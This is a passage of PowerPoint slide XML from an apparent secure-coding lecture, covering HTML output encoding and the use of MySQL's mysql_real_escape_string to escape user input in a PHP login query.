          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>“&lt;“ → “&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpUtility.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>in .NET</a:t>
            </a:r>
          </a:p>
          <a:p>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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en-US" altLang="cs-CZ"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(MYSQL *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> *to, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="828675" y="4997450"/>
            <a:ext cx="7415213" cy="952500"/>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sz="1400"/>
              <a:t>$query = sprintf("SELECT * FROM `Users` WHERE UserName='%s' AND Password='%s'", </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_real_escape_string($Username), </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_real_escape_string($Password)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400"/>
              <a:t>); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_query($query);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60421" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107950" y="2997200"/>
            <a:ext cx="8980488" cy="1323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sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>legal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> use in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>taking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>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dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>placed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1600" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>terminating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>appended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NUL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(ASCII 0), “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\r</a:t>
            </a:r>
            <a:r>
